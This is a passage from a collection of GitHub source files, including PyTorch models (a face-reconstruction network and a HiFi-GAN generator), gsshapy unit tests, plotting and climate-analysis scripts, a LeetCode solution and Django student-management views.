nn.BatchNorm1d(512),\n nn.ReLU(inplace=True),\n nn.Conv1d(512, 256, 1),\n nn.BatchNorm1d(256),\n nn.ReLU(inplace=True),\n )\n\n self.recon_head = nn.Sequential(\n nn.Conv1d(256, 128, 1),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, self.recon_num, 1),\n )\n\n self.face_decoder = nn.Sequential(\n nn.Conv1d(FLAGS.feat_face + 3, 512, 1),\n nn.BatchNorm1d(512),\n nn.ReLU(inplace=True),\n nn.Conv1d(512, 256, 1),\n nn.BatchNorm1d(256),\n nn.ReLU(inplace=True),\n )\n\n self.vote_head_1= VoteHead()\n self.vote_head_2= VoteHead()\n self.vote_head_3= VoteHead()\n self.vote_head_4= VoteHead()\n self.vote_head_5= VoteHead()\n self.vote_head_6= VoteHead()\n self.vote_head_list = [self.vote_head_1, self.vote_head_2, self.vote_head_3,\n self.vote_head_4, self.vote_head_5, self.vote_head_6]\n self.mask_head = nn.Sequential(\n nn.Conv1d(256, 128, 1),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, 1, 1),\n nn.Sigmoid()\n )\n self._init_weights()\n\n def forward(self,\n feat: \"tensor (bs, vetice_num, 256)\",\n feat_global: \"tensor (bs, 1, 256)\",\n vertices: \"tensor (bs, vetice_num, 3)\",\n face_shift_prior: \"tensor (bs, vetice_num, 18)\",\n\n ):\n \"\"\"\n Return: (bs, vertice_num, class_num)\n \"\"\"\n # concate feature\n bs, vertice_num, _ = feat.size()\n feat_face_re = feat_global.view(bs, 1, feat_global.shape[1]).repeat(1, feat.shape[1], 1).permute(0, 2, 1)\n conv1d_input = feat.permute(0, 2, 1) # (bs, fuse_ch, vertice_num)\n conv1d_out = self.conv1d_block(conv1d_input)\n\n recon = self.recon_head(conv1d_out)\n # average pooling for face prediction\n feat_face_in = torch.cat([feat_face_re, conv1d_out, vertices.permute(0, 2, 1)], dim=1)\n feat = self.face_decoder(feat_face_in)\n mask = self.mask_head(feat)\n face_shift_delta = torch.zeros((bs, vertice_num, 18)).to(feat.device)\n face_log_var = torch.zeros((bs, vertice_num, 6)).to(feat.device)\n for i, vote_head in enumerate(self.vote_head_list):\n face_vote_result = vote_head(feat, face_shift_prior[:,:,3*i:3*i+3])\n face_shift_delta[:,:,3*i:3*i+3] = face_vote_result[:,:,:3]\n face_log_var[:,:,i] = face_vote_result[:,:,3]\n\n return recon.permute(0, 2, 1), face_shift_delta, face_log_var, mask.squeeze()\n\n def _init_weights(self):\n for m in self.modules():\n if isinstance(m, (nn.Conv2d, nn.ConvTranspose2d, nn.Conv1d)):\n normal_init(m, std=0.001)\n elif isinstance(m, (_BatchNorm, nn.GroupNorm)):\n constant_init(m, 1)\n elif isinstance(m, nn.Linear):\n normal_init(m, std=0.001)\n\n\nclass VoteHead(nn.Module):\n def __init__(self):\n super(VoteHead, self).__init__()\n self.layer = nn.Sequential(\n nn.Conv1d(256 + 3, 128, 1),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, 3 + 1, 1),\n )\n\n\n def forward(self,\n feat: \"tensor (bs, 256, vertice_num)\",\n face_shift_prior: \"tensor (bs, vertice_num, 3)\"\n ):\n \"\"\"\n Return: (bs, vertice_num, class_num)\n \"\"\"\n feat_face_in = torch.cat([feat, face_shift_prior.permute(0, 2, 1)], dim=1)\n face = self.layer(feat_face_in)\n return face.permute(0, 2, 1)\n\ndef main(argv):\n classifier_seg3D = FaceRecon()\n\n points = torch.rand(2, 1000, 3)\n import numpy as np\n obj_idh = torch.ones((2, 1))\n obj_idh[1, 0] = 5\n '''\n if obj_idh.shape[0] == 1:\n obj_idh = obj_idh.view(-1, 1).repeat(points.shape[0], 1)\n else:\n obj_idh = obj_idh.view(-1, 1)\n\n one_hot = torch.zeros(points.shape[0], 6).scatter_(1, obj_idh.cpu().long(), 1)\n '''\n recon, face, feat = classifier_seg3D(points, obj_idh)\n face = face.squeeze(0)\n t = 1\n\n\n\nif __name__ == \"__main__\":\n print(1)\n from config.config import *\n app.run(main)\n\n\n","repo_name":"lolrudy/RBP_Pose","sub_path":"network/fs_net_repo/FaceRecon.py","file_name":"FaceRecon.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"25706493550","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef f(x):\r\n x = np.radians(x)\r\n return np.exp(np.cos(x)) + np.log(np.sin(0.8 * x) ** 2 + 1) * np.cos(x)\r\n\r\ndef y(x):\r\n x = np.radians(x)\r\n return -np.log((np.cos(x) + np.sin(x)) ** 2 + 1.7) + 2\r\n\r\nx1, x2 = -240, 360\r\nxsticks = np.arange(x1 - 10, x2, 50)\r\nxsticks[0], xsticks[-1] = x1, x2\r\nxsticks = sorted(np.append(xsticks, 71))\r\nx = np.linspace(x1, x2, 10000)\r\n\r\nprint(f\"В точке x = 71о значения функции: f(x) {['=','>','<'][int(np.sign(f(71)-y(71)))]} y(x)\")\r\nprint(f\"На интервале [{x1}, {x2}] мин.значение у функции: {['','y(x)','f(x)'][int(np.sign(min(f(x))-min(y(x))))]}\")\r\nprint(f\"На интервале [{x1}, {x2}] только отрицательные значения у функции: {['f(x)' if all(f(x)<0) else 'y(x)' if all(y(x)<0) else 'нет']}\")\r\nprint(f\"На интервале [{x1}, {x2}] функции f(x) и y(x) имеют точек пересечений: {len(np.argwhere(np.diff(np.sign(f(x) - y(x)))))}\")\r\n\r\n# отображаем графики\r\nfig, ax = plt.subplots(figsize=(12, 6))\r\nplt.title(\"Графики функций\")\r\nplt.plot(x, f(x), label='f(x)')\r\nplt.plot(x, y(x), label='y(x)')\r\nax.axhline(y=0, color='k', lw=1)\r\nax.axvline(x=71, color='g', lw=1)\r\nax.set_xticks(xsticks)\r\nplt.legend()\r\nplt.grid()\r\nplt.show()","repo_name":"IgorLutoshkin/Pyton-tasks","sub_path":"2.2.3.py","file_name":"2.2.3.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14090710401","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn import Conv1d, ConvTranspose1d\nfrom torch.nn.utils import weight_norm, remove_weight_norm\n\nLRELU_SLOPE = 0.1\n\n\ndef init_weights(m, mean=0.0, std=0.01):\n classname = m.__class__.__name__\n if classname.find(\"Conv\") != -1:\n m.weight.data.normal_(mean, std)\n\n\ndef get_padding(kernel_size, dilation=1):\n return int((kernel_size * dilation - dilation) / 2)\n\n\nclass ResBlock(torch.nn.Module):\n def __init__(self, h, channels, kernel_size=3, dilation=(1, 3, 5)):\n super(ResBlock, self).__init__()\n self.h = h\n self.convs1 = nn.ModuleList(\n [\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=dilation[0],\n padding=get_padding(kernel_size, dilation[0]),\n )\n ),\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=dilation[1],\n padding=get_padding(kernel_size, dilation[1]),\n )\n ),\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=dilation[2],\n padding=get_padding(kernel_size, dilation[2]),\n )\n ),\n ]\n )\n self.convs1.apply(init_weights)\n\n self.convs2 = nn.ModuleList(\n [\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=1,\n padding=get_padding(kernel_size, 1),\n )\n ),\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=1,\n padding=get_padding(kernel_size, 1),\n )\n ),\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=1,\n padding=get_padding(kernel_size, 1),\n )\n ),\n ]\n )\n self.convs2.apply(init_weights)\n\n def forward(self, x):\n for c1, c2 in zip(self.convs1, self.convs2):\n xt = F.leaky_relu(x, LRELU_SLOPE)\n xt = c1(xt)\n xt = F.leaky_relu(xt, LRELU_SLOPE)\n xt = c2(xt)\n x = xt + x\n return x\n\n def remove_weight_norm(self):\n for l in self.convs1:\n remove_weight_norm(l)\n for l in self.convs2:\n remove_weight_norm(l)\n\n\nclass Generator(torch.nn.Module):\n def __init__(self, h):\n super(Generator, self).__init__()\n self.h = h\n self.num_kernels = len(h.resblock_kernel_sizes)\n self.num_upsamples = len(h.upsample_rates)\n self.conv_pre = weight_norm(\n Conv1d(80, h.upsample_initial_channel, 7, 1, padding=3)\n )\n resblock = ResBlock\n\n self.ups = nn.ModuleList()\n for i, (u, k) in enumerate(zip(h.upsample_rates, h.upsample_kernel_sizes)):\n self.ups.append(\n weight_norm(\n ConvTranspose1d(\n h.upsample_initial_channel // (2**i),\n h.upsample_initial_channel // (2 ** (i + 1)),\n k,\n u,\n padding=(k - u) // 2,\n )\n )\n )\n\n self.resblocks = nn.ModuleList()\n for i in range(len(self.ups)):\n ch = h.upsample_initial_channel // (2 ** (i + 1))\n for j, (k, d) in enumerate(\n zip(h.resblock_kernel_sizes, h.resblock_dilation_sizes)\n ):\n self.resblocks.append(resblock(h, ch, k, d))\n\n self.conv_post = weight_norm(Conv1d(ch, 1, 7, 1, padding=3))\n self.ups.apply(init_weights)\n self.conv_post.apply(init_weights)\n\n def forward(self, x):\n x = self.conv_pre(x)\n for i in range(self.num_upsamples):\n x = F.leaky_relu(x, LRELU_SLOPE)\n x = self.ups[i](x)\n xs = None\n for j in range(self.num_kernels):\n if xs is None:\n xs = self.resblocks[i * self.num_kernels + j](x)\n else:\n xs += self.resblocks[i * self.num_kernels + j](x)\n x = xs / self.num_kernels\n x = F.leaky_relu(x)\n x = self.conv_post(x)\n x = torch.tanh(x)\n\n return x\n\n def remove_weight_norm(self):\n print(\"Removing weight norm...\")\n for l in self.ups:\n remove_weight_norm(l)\n for l in self.resblocks:\n l.remove_weight_norm()\n remove_weight_norm(self.conv_pre)\n remove_weight_norm(self.conv_post)\n","repo_name":"MiniXC/simple_hifigan","sub_path":"src/simple_hifigan/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31236307781","text":"from builtins import zip\nimport unittest\nimport os\n\nfrom gsshapy.orm.file_io import *\nfrom gsshapy.orm import ProjectFile\nfrom gsshapy.lib import db_tools as dbt\n\n\nclass TestReadMethods(unittest.TestCase):\n def setUp(self):\n # Find db directory path\n here = os.path.abspath(os.path.dirname(__file__))\n\n # Create Test DB\n sqlalchemy_url, sql_engine = dbt.init_sqlite_memory()\n\n # Create DB Sessions\n session_maker = dbt.get_sessionmaker(sqlalchemy_url, sql_engine)\n self.readSession = session_maker()\n self.querySession = session_maker()\n\n # Define directory of test files to read\n self.directory = os.path.join(here, 'standard')\n\n def test_project_file_read(self):\n \"\"\"\n Test ProjectFile read method\n \"\"\"\n prjR, prjQ = self._read_n_query(fileIO=ProjectFile,\n directory=self.directory,\n filename='standard.prj')\n\n # Tests\n self.assertEqual(prjR.name, prjQ.name)\n self.assertEqual(prjR.mapType, prjQ.mapType)\n\n # Retrieve Cards\n cardsR = prjR.projectCards\n cardsQ = prjQ.projectCards\n\n for cardR, cardQ in zip(cardsR, cardsQ):\n # Compare cards and values\n self.assertEqual(cardR.name, cardQ.name)\n self.assertEqual(cardR.value, cardQ.value)\n\n def test_channel_input_read(self):\n \"\"\"\n Test ChannelInputFile read method\n \"\"\"\n # Read and Query\n cifR, cifQ = self._read_n_query(fileIO=ChannelInputFile,\n directory=self.directory,\n filename='standard.cif')\n\n # Tests\n self.assertEqual(cifR, cifQ)\n\n # Check Links\n linksR = cifR.streamLinks\n linksQ = cifQ.streamLinks\n\n for linkR, linkQ in zip(linksR, linksQ):\n self.assertEqual(linkR, linkQ)\n\n # Check Nodes\n nodesR = linkR.nodes\n nodesQ = linkQ.nodes\n\n self._list_compare(nodesR, nodesQ)\n\n # Check Upstream Links\n upLinksR = linkR.upstreamLinks\n upLinksQ = linkQ.upstreamLinks\n\n self._list_compare(upLinksR, upLinksQ)\n\n # Check Weirs\n weirsR = linkR.weirs\n weirsQ = linkQ.weirs\n\n self._list_compare(weirsR, weirsQ)\n\n # Check Culverts\n culvertsR = linkR.culverts\n culvertsQ = linkQ.culverts\n\n self._list_compare(culvertsR, culvertsQ)\n\n # Check Reservoir\n resR = linkR.reservoir\n resQ = linkQ.reservoir\n\n self.assertEqual(resR, resQ)\n\n # Check Reservoir Points\n if resR is not None and resQ is not None:\n resPointsR = resR.reservoirPoints\n resPointsQ = resQ.reservoirPoints\n self._list_compare(resPointsR, resPointsQ)\n\n # Check Trapezoidal CS\n trapR = linkR.trapezoidalCS\n trapQ = linkQ.trapezoidalCS\n\n self.assertEqual(trapR, trapQ)\n\n # Check Breakpoint CS\n breakR = linkR.breakpointCS\n breakQ = linkQ.breakpointCS\n\n self.assertEqual(breakR, breakQ)\n\n # Check Break Points\n if breakR is not None and breakQ is not None:\n bpR = breakR.breakpoints\n bpQ = breakQ.breakpoints\n\n self._list_compare(bpR, bpQ)\n\n def test_map_table_file_read(self):\n \"\"\"\n Test MapTableFile read method\n \"\"\"\n # Read and Query\n cmtR, cmtQ = self._read_n_query(fileIO=MapTableFile,\n directory=self.directory,\n filename='standard.cmt')\n\n # Tests\n\n # Check Index Maps\n idxMapsR = cmtR.indexMaps\n idxMapsQ = cmtQ.indexMaps\n\n self._list_compare(idxMapsR, idxMapsQ)\n\n # Check Map Tables\n mapTablesR = cmtR.mapTables\n mapTablesQ = cmtQ.mapTables\n\n for mapTableR, mapTableQ in zip(mapTablesR, mapTablesQ):\n self.assertEqual(mapTableR, mapTableQ)\n\n\n # Check sediments\n sedsR = mapTableR.sediments\n sedsQ = mapTableQ.sediments\n\n if sedsR is not None and sedsQ is not None:\n self._list_compare(sedsR, sedsQ)\n\n # Check Values\n valsR = mapTableR.values\n valsQ = mapTableQ.values\n\n for valR, valQ in zip(valsR, valsQ):\n self.assertEqual(valR, valQ)\n\n # Check Contaminant\n contamR = valR.contaminant\n contamQ = valR.contaminant\n\n\n if contamR is not None and contamQ is not None:\n self.assertEqual(contamR, contamQ)\n\n # Check Index\n indexR = valR.index\n indexQ = valQ.index\n\n self.assertEqual(indexR, indexQ)\n\n def test_precip_file_read(self):\n \"\"\"\n Test PrecipFile read method\n \"\"\"\n gagR, gagQ = self._read_n_query(fileIO=PrecipFile,\n directory=self.directory,\n filename='standard.gag')\n\n # Tests\n\n def test_grid_pipe_file_read(self):\n \"\"\"\n Test GridPipeFile read method\n \"\"\"\n gpiR, gpiQ = self._read_n_query(fileIO=GridPipeFile,\n directory=self.directory,\n filename='standard.gpi')\n\n # Tests\n\n def test_grid_stream_file_read(self):\n \"\"\"\n Test GridStreamFile read method\n \"\"\"\n gstR, gstQ = self._read_n_query(fileIO=GridStreamFile,\n directory=self.directory,\n filename='standard.gst')\n\n # Tests\n\n def test_hmet_file_read(self):\n \"\"\"\n Test HmetFile read method\n \"\"\"\n hmetR, hmetQ = self._read_n_query(fileIO=HmetFile,\n directory=self.directory,\n filename='hmet_wes.hmt')\n\n # Tests\n\n def test_output_location_file_read(self):\n \"\"\"\n Test OutputLocationFile read method\n \"\"\"\n locR, locQ = self._read_n_query(fileIO=OutputLocationFile,\n directory=self.directory,\n filename='standard.ihl')\n\n # Tests\n\n def test_link_node_dataset_file_read(self):\n \"\"\"\n Test LinkNodeDatasetFile read method\n \"\"\"\n lndR, lndQ = self._read_n_query(fileIO=LinkNodeDatasetFile,\n directory=self.directory,\n filename='standard.cdp')\n\n # Tests\n\n def test_raster_map_file_read(self):\n \"\"\"\n Test RasterMapFile read method\n \"\"\"\n mapR, mapQ = self._read_n_query(fileIO=RasterMapFile,\n directory=self.directory,\n filename='standard.msk')\n\n # Tests\n\n def test_projection_file_read(self):\n \"\"\"\n Test ProjectionFile read method\n \"\"\"\n proR, proQ = self._read_n_query(fileIO=ProjectionFile,\n directory=self.directory,\n filename='standard_prj.pro')\n\n # Tests\n\n def test_replace_param_file_read(self):\n \"\"\"\n Test ReplaceParamFile read method\n \"\"\"\n repR, repQ = self._read_n_query(fileIO=ReplaceParamFile,\n directory=self.directory,\n filename='replace_param.txt')\n\n # Tests\n\n def test_replace_val_file_read(self):\n \"\"\"\n Test ReplaceValFile read method\n \"\"\"\n repR, repQ = self._read_n_query(fileIO=ReplaceValFile,\n directory=self.directory,\n filename='replace_val.txt')\n\n # Tests\n\n def test_nwsrfs_file_read(self):\n \"\"\"\n Test NwsrfsFile read method\n \"\"\"\n snwR, snwQ = self._read_n_query(fileIO=NwsrfsFile,\n directory=self.directory,\n filename='nwsrfs_elev.txt')\n\n # Tests\n\n def test_oro_gage_file_read(self):\n \"\"\"\n Test OrographicGageFile read method\n \"\"\"\n snwR, snwQ = self._read_n_query(fileIO=OrographicGageFile,\n directory=self.directory,\n filename='oro_gages.txt')\n\n # Tests\n\n def test_storm_pipe_network_file_read(self):\n \"\"\"\n Test StormPipeNetworkFile read method\n \"\"\"\n spnR, spnQ = self._read_n_query(fileIO=StormPipeNetworkFile,\n directory=self.directory,\n filename='standard.spn')\n\n # Tests\n\n def test_time_series_file_read(self):\n \"\"\"\n Test TimeSeriesFile read method\n \"\"\"\n timR, timQ = self._read_n_query(fileIO=TimeSeriesFile,\n directory=self.directory,\n filename='standard.ohl')\n\n # Tests\n dfR = timR.as_dataframe()\n dfQ = timQ.as_dataframe()\n assert dfR.equals(dfQ)\n assert len(dfR.index) == 10\n self.assertAlmostEqual(dfR.iloc[7, 1], 0.016869)\n self.assertAlmostEqual(dfR.index[7], 2002.42440068)\n\n def test_evt_yml_file_read(self):\n \"\"\"\n Test ProjectFileEventManager read method\n \"\"\"\n dir_list = ('run_2014_to_2017', 'run_2015_to_2017',\n 'run_2016_to_2017')\n for subdir in dir_list:\n try:\n os.mkdir(os.path.join(self.directory, subdir))\n except OSError:\n pass\n\n ymlR, ymlQ = self._read_n_query(fileIO=ProjectFileEventManager,\n directory=self.directory,\n filename='testyml.yml')\n\n # Tests\n assert ymlR.events.count() == 3\n a = ymlR.events.filter_by(subfolder='run_2015_to_2017').one()\n\n # cleanup\n for subdir in dir_list:\n try:\n os.rmdir(os.path.join(self.directory, subdir))\n except OSError:\n pass\n\n def test_evt_yml_file_read_error(self):\n \"\"\"\n Test ProjectFileEventManager read method integrity\n \"\"\"\n dir_list = ('run_2014_to_2017', 'run_2015_to_2017',\n 'run_2016_to_2017')\n for subdir in dir_list:\n try:\n os.mkdir(os.path.join(self.directory, subdir))\n except OSError:\n pass\n\n ymlR, ymlQ = self._read_n_query(fileIO=ProjectFileEventManager,\n directory=self.directory,\n filename='testyml_error.yml')\n\n # Tests\n assert ymlR.events.count() == 3\n a = ymlR.events.filter_by(subfolder='run_2015_to_2017').one()\n\n # cleanup\n for subdir in dir_list:\n try:\n os.rmdir(os.path.join(self.directory, subdir))\n except OSError:\n pass\n\n def test_evt_yml_file_read_nodir(self):\n \"\"\"\n Test ProjectFileEventManager read method without directories\n \"\"\"\n ymlR, ymlQ = self._read_n_query(fileIO=ProjectFileEventManager,\n directory=self.directory,\n filename='testyml.yml')\n\n # Tests\n assert ymlR.events.count() == 0\n\n def test_index_map_read(self):\n \"\"\"\n Test IndexMap read method\n \"\"\"\n # Instantiate GSSHAPY object for reading to database\n idxR = IndexMap(name='Soil')\n\n # Call read method\n idxR.read(directory=self.directory,\n filename='Soil.idx',\n session=self.readSession,)\n\n # Query from database\n idxQ = self.querySession.query(IndexMap).one()\n\n # Tests\n\n def test_project_file_read_all(self):\n \"\"\"\n Test ProjectFile read all method\n \"\"\"\n # Instantiate GSSHAPY ProjectFile object\n prjR = ProjectFile()\n\n # Invoke read all method\n prjR.readProject(directory=self.directory,\n projectFileName='standard.prj',\n session=self.readSession)\n\n # Query Project File\n prjQ = self.querySession.query(ProjectFile).one()\n\n # Tests\n\n def test_project_file_read_input(self):\n \"\"\"\n Test ProjectFile read input method\n \"\"\"\n # Instantiate GSSHAPY ProjectFile object\n prjR = ProjectFile()\n\n # Invoke read input method\n prjR.readInput(directory=self.directory,\n projectFileName='standard.prj',\n session=self.readSession)\n\n # Query Project File\n prjQ = self.querySession.query(ProjectFile).one()\n\n # Tests\n\n def test_project_file_read_output(self):\n \"\"\"\n Test ProjectFile read output method\n \"\"\"\n # Instantiate GSSHAPY ProjectFile object\n prjR = ProjectFile()\n\n # Invoke read output method\n prjR.readOutput(directory=self.directory,\n projectFileName='standard.prj',\n session=self.readSession)\n\n # Query Project File\n prjQ = self.querySession.query(ProjectFile).one()\n\n # Tests\n\n def _read_n_query(self, fileIO, directory, filename):\n \"\"\"\n Read to database and Query from database\n \"\"\"\n # Instantiate GSSHAPY object for reading to database\n instanceR = fileIO()\n\n # Call read method\n instanceR.read(directory=directory,\n filename=filename,\n session=self.readSession)\n\n # Query from database\n instanceQ = self.querySession.query(fileIO).one()\n\n return instanceR, instanceQ\n\n def _list_compare(self, listone, listtwo):\n for one, two in zip(listone, listtwo):\n self.assertEqual(one, two)\n\n def tearDown(self):\n self.readSession.close()\n self.querySession.close()\n\nsuite = unittest.TestLoader().loadTestsFromTestCase(TestReadMethods)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"CI-WATER/gsshapy","sub_path":"tests/test_read.py","file_name":"test_read.py","file_ext":"py","file_size_in_byte":14709,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"21149555534","text":"class Solution:\n def maxFrequency(self, nums: List[int], k: int) -> int:\n # Time Complexity: O(N log N)\n # Space Complexity: O(N)\n\n nums.sort()\n\n prefixes = list(accumulate(nums))\n ret = 0\n\n for val in set(nums):\n start, end = bisect_left(nums, val), bisect_right(nums, val)\n freq = end - start\n\n low = 0\n high = start\n\n while low < high:\n mid = low + (high - low) // 2\n\n num_values = start - mid\n targ = val * num_values\n existing = prefixes[start - 1] - prefixes[mid - 1] if mid else prefixes[start - 1]\n\n if targ - existing > k:\n low = mid + 1\n else:\n high = mid\n\n\n ret = max(ret, freq + start - low)\n\n return ret\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/1838. Frequency of the Most Frequent Element/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"27892976816","text":"import pandas as pd\nimport numpy as np\n\ndef right_left(field, th):\n \"\"\"\n Separate geopotential field into left and right of the th line.\n\n Parameters\n ----------\n field (xr.DataArray): The geopotential field\n th: The direction (in degrees)\n\n Returns\n -------\n left, right (2 xr.DataArray): The left and right side of the geopt. field.\n \"\"\"\n if th <= 180:\n return field.where((field.az <= th) | (field.az > 180 + th)), field.where(\n (field.az > th) & (field.az <= 180 + th)\n )\n else:\n return field.where((field.az <= th) & (field.az > th - 180)), field.where(\n (field.az > th) | (field.az <= th - 180)\n )\n\n\ndef right_left_vector(z, th):\n \"\"\"\n Separate geopotential field into left and right of the th line.\n\n Parameters\n ----------\n z (xr.DataArray): The geopotential field\n th: The direction (in degrees)\n\n Returns\n -------\n left, right (2 xr.DataArray): The left and right side of the z. field.\n \"\"\"\n\n A = pd.DataFrame([list(z.az.values)] * len(z.snapshot)) # matrix of az x snapshot\n mask = np.array((A.lt(th, 0) & A.ge(th - 180, 0)) | A.ge(th + 180, 0)) # Mask in 2D (az, snapshot)\n mask = np.array([mask] * len(z.r)) # Mask in 3D (r, az, snapshot)\n mask = np.swapaxes(mask, 0, 1) # Mask in 3D (az, r, snapshot)\n R, L = z.where(mask), z.where(\n ~mask\n )\n return R, L\n\n\ndef area_weights(field):\n \"\"\"\n Computes the weights needed for the weighted mean of polar field.\n\n Parameters\n ----------\n field (xr.DataArray): The geopotential field\n\n Returns\n -------\n w (xr.DataArray): The weights corresponding to the area wrt the radius.\n \"\"\"\n δ = (field.r[1] - field.r[0]) / 2\n w = (field.r + δ) ** 2 - (field.r - δ) ** 2\n return w\n\n\ndef B(th, geopt, SH=False, names=[\"snap_z900\", \"snap_z600\"]):\n \"\"\"\n Computes the B parameter for a point, with the corresponding snapshot of geopt at 600hPa and 900hPa\n\n Parameters\n ----------\n th: The direction (in degrees)\n geopt (xr.DataSet): The snapshots at both levels\n SH (bool): Set to True if the point is in the southern hemisphere\n names: names of the 900hPa and 600hPa geopt. variables in geopt.\n\n Returns\n -------\n B, the Hart phase space parameter for symetry.\n \"\"\"\n if type(names) == str:\n z900 = geopt[names].sel(plev=900e2, method=\"nearest\")\n print(\"Level \" + str(z900.plev.values) + \" is taken for 900hPa\")\n z600 = geopt[names].sel(plev=600e2, method=\"nearest\")\n print(\"Level \" + str(z600.plev.values) + \" is taken for 600hPa\")\n else:\n z900 = geopt[names[0]]\n z600 = geopt[names[1]]\n\n ΔZ = z600 - z900\n ΔZ_R, ΔZ_L = right_left_vector(ΔZ, th)\n if SH:\n h = -1\n else:\n h = 1\n return h * (\n ΔZ_R.weighted(area_weights(ΔZ_R)).mean([\"r\", \"az\"])\n - ΔZ_L.weighted(area_weights(ΔZ_L)).mean([\"r\", \"az\"])\n ).values\n\n\ndef B_vector(th_vec, z900, z600, lat):\n \"\"\"\n Computes the B parameter for a vector of points, with the corresponding snapshot of geopt at 600hPa and 900hPa\n\n Parameters\n ----------\n th_vec : The theta parameter for each point\n z900 : The z900 field for each point\n z600 : The z600 field for each point\n lat : The latitude of each point\n\n Returns\n -------\n B, the Hart phase space parameter for symetry.\n \"\"\"\n ΔZ = z600 - z900\n ΔZ_R, ΔZ_L = right_left_vector(ΔZ, th_vec)\n h = np.where(lat < 0, -1, 1)\n return h * (\n ΔZ_R.weighted(area_weights(ΔZ_R)).mean([\"az\", \"r\"])\n - ΔZ_L.weighted(area_weights(ΔZ_L)).mean([\"az\", \"r\"])\n )\n","repo_name":"stella-bourdin/CPyS","sub_path":"CPyS/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70381465389","text":"def uniqueValues(aDict):\n '''\n aDict: a dictionary\n '''\n # Your code here\n keys = aDict.keys()\n copykeys = list(aDict.keys())\n for item in keys:\n tempval = aDict[item]\n counter = 0\n for item2 in keys:\n firstitem = item2\n if aDict[item2] == tempval: \n counter += 1\n if counter == 2:\n if item2 in copykeys:\n copykeys.remove(item2)\n if item in copykeys:\n copykeys.remove(item)\n \n return(copykeys)\n \n\n\n\ndicky = {'vops':2, 'zips':1, 'bips':1, 'topple':5}\nprint(uniqueValues(dicky))\n","repo_name":"linkel/MITx-6.00.1x-2018","sub_path":"Midterm/adict.py","file_name":"adict.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24180241414","text":"from django.shortcuts import render\nfrom .models import Student\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom .forms import StudentForm\n# Create your views here.\n\ndef index(requset):\n return render(requset,'students/index.html',{\n 'students': Student.objects.all()\n })\n \ndef view_student(requset,id):\n student = Student.objects.get(pk=id)\n return HttpResponseRedirect(reverse('index'))\n\ndef add(requset):\n if requset.method == 'POST':\n form = StudentForm(requset.POST)\n if form.is_valid():\n new_student_id = form.cleaned_data['student_id']\n new_first_name = form.cleaned_data['first_name']\n new_last_name = form.cleaned_data['last_name']\n new_email = form.cleaned_data['email']\n new_filed_of_study = form.cleaned_data['field_of_study']\n new_gpa= form.cleaned_data['gpa']\n \n new_student = Student(\n student_id = new_student_id,\n first_name = new_first_name,\n last_name = new_last_name,\n email = new_email,\n field_of_study = new_filed_of_study,\n gpa = new_gpa \n )\n \n new_student.save()\n return render(requset,'students/add.html',{\n 'from' : StudentForm(),\n 'success' : True\n })\n else:\n form = StudentForm()\n return render(requset,'students/add.html',{\n 'form' : StudentForm()\n })\n \n \ndef edit(requset,id):\n if requset.method == 'POST':\n student= Student.objects.get(pk=id)\n form = StudentForm(requset.POST,instance=student)\n if form.is_valid():\n form.save()\n return render (requset,'students/edit.html', {\n 'form' : form,\n 'success' : True\n })\n else:\n student = Student.objects.get(pk=id)\n form = StudentForm(instance=student) \n return render (requset,'students/edit.html', {\n 'form' : form\n })\n \n\ndef delete(requset,id):\n if requset.method == 'POST':\n student= Student.objects.get(pk=id)\n student.delete()\n return HttpResponseRedirect(reverse('index'))","repo_name":"mhdnabeel06/students_managment_system","sub_path":"student_management/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15796573899","text":"from ibooking.app import minute_00, minute_10, minute_15, minute_45\nfrom datetime import datetime\n\nclass Book_api:\n\n def book_add(self, client, is_login: bool=True, book_dict: dict=None) -> dict:\n \"\"\" 创建一个自习预约,处于等待签到状态 \"\"\"\n\n book_dict = {\n 'seat_id': 2,\n 'start_time': datetime(2023, 4, 15, 16).__str__(),\n 'end_time': datetime(2023, 4, 15, 19).__str__()\n } if book_dict is None else book_dict\n\n resp = client.post(\"/book/submit\", data=book_dict)\n assert resp.status_code == 200 if is_login else resp.status_code == 401\n return resp.json\n\n\n def book_cancel(self, client, is_login: bool=True, book_id: int=1) -> dict: \n \"\"\" 取消一个自习预约,只对处于等待签到、等待开始、正在进行的自习预约有效\"\"\"\n \n resp = client.post(\"/book/cancel\", data={\n 'id': book_id\n })\n assert resp.status_code == 200 if is_login else resp.status_code == 401\n return resp.json\n \n\n def 